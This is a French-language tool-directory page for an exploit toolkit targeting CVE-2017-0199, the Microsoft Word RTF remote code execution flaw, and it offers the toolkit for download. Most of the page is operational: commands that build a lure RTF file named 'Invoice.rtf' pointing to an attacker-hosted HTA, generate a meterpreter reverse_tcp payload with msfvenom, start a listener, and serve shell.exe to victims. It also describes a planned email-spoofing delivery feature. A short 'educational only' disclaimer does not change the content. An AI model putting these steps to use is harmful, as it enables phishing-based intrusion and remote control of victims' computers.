Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-0199 — Exploit toolkit CVE-2017-0199 - v2.0 est un script python pratique qui offre un moyen rapide et efficace d'exploiter la RCE Microsoft RTF. Il peut générer un fichier RTF malveillant et délivrer metasploit / meterpreter / n'importe quel autre payload à la victime sans configuration complexe. | Kitploit
Outils/GitHubGitHub/exploit-install/cve-2017-0199
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleDéveloppement de Charges Utiles
GitHubexploit-install/cve-2017-0199

CVE-2017-0199

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Voir le dépôt
79il y a 9 ansPas encore vérifié

Exploit toolkit CVE-2017-0199 - v2.0 est un script python pratique qui offre un moyen rapide et efficace d'exploiter la RCE Microsoft RTF. Il peut générer un fichier RTF malveillant et délivrer metasploit / meterpreter / n'importe quel autre payload à la victime sans configuration complexe.

Partager

Exploit toolkit CVE-2017-0199 - v2.0

Exploit toolkit CVE-2017-0199 - v2.0 est un script Python pratique qui fournit un moyen rapide et efficace d'exploiter la RCE Microsoft RTF. Il peut générer un fichier RTF malveillant et délivrer une charge utile metasploit / meterpreter à la victime sans aucune configuration complexe.

Tutoriel vidéo

https://youtu.be/42LjG7bAvpg

Note de version :

Les capacités suivantes ont été introduites dans le script

root@kitploit:~
- Générer un fichier RTF malveillant à l'aide de la trousse
- Exécuter la trousse en mode exploitation comme un petit serveur HTA + Web

Version : Python version 2.7.13

Version future :

Fonctionnalité en cours de développement

root@kitploit:~
- Envoyer automatiquement le fichier RTF malveillant généré à la victime par usurpation d'e-mail
	

Exemple :

  • Étape 1 : Générer un fichier RTF malveillant à l'aide de la commande suivante et l'envoyer à la victime

    root@kitploit:~
      Syntaxe :
    
      # python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
    
      Exemple :
    
      # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
    
  • Étape 2 (facultatif, si vous utilisez une charge utile MSF) : Générer la charge utile metasploit et démarrer le gestionnaire

    root@kitploit:~
      Exemple :
    
      Générer la charge utile :
    
      # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
    
      Démarrer le gestionnaire :
    
      # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
    
  • Étape 3 : Démarrer la trousse en mode exploitation pour délivrer les charges utiles

    root@kitploit:~
      Syntaxe :
    
      # python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
    
      Exemple :
    
      # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
    

Arguments de la ligne de commande :

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

Ceci est une trousse pratique pour exploiter CVE-2017-0199 (Microsoft Word RTF RCE)

Modes :

-M gen                                          Générer uniquement le fichier RTF malveillant

     Générer le fichier RTF malveillant :

      -w <Filename.rtf>                   Nom du fichier RTF malveillant (Partagez ce fichier avec la victime).

      -u <http://attacker.com/test.hta>   Le chemin vers un fichier hta. Normalement, il s'agit d'un domaine ou d'une adresse IP où cet outil est exécuté.

                                             Par exemple, http://attackerip.com/test.hta (Cette URL sera incluse dans le fichier RTF malveillant et

                                             sera demandée dès que la victime ouvrira le fichier RTF malveillant.
-M exp                                          Démarrer le mode exploitation

     Exploitation :

      -p <TCP port:Default 80>            Numéro de port local.

      -e <http://attacker.com/shell.exe>  Le chemin d'un fichier exécutable / shell meterpreter / charge utile qui doit être exécuté sur la cible.

      -l </tmp/shell.exe>                 Chemin local d'un fichier exécutable / shell meterpreter / charge utile (si la charge utile est hébergée localement).

Avertissement

Ce programme est UNIQUEMENT à des fins éducatives. Ne l'utilisez pas sans autorisation. L'avertissement habituel s'applique, notamment le fait que moi (bhdresh) ne suis pas responsable des dommages causés par une utilisation directe ou indirecte des informations ou des fonctionnalités fournies par ces programmes. L'auteur ou tout fournisseur d'accès Internet ne porte AUCUNE responsabilité quant au contenu ou à la mauvaise utilisation de ces programmes ou de leurs dérivés. En utilisant ce programme, vous acceptez le fait que tout dommage (perte de données, crash du système, compromission du système, etc.) causé par l'utilisation de ces programmes n'est pas de la responsabilité de bhdresh.

Crédit

@nixawk pour l'échantillon RTF, @bhdresh

Bugs, problèmes, demandes de fonctionnalités

Évidemment, je ne suis pas développeur à temps plein, attendez-vous donc à quelques accrocs

Veuillez signaler les bugs et problèmes à [email protected]

Télécharger l’outil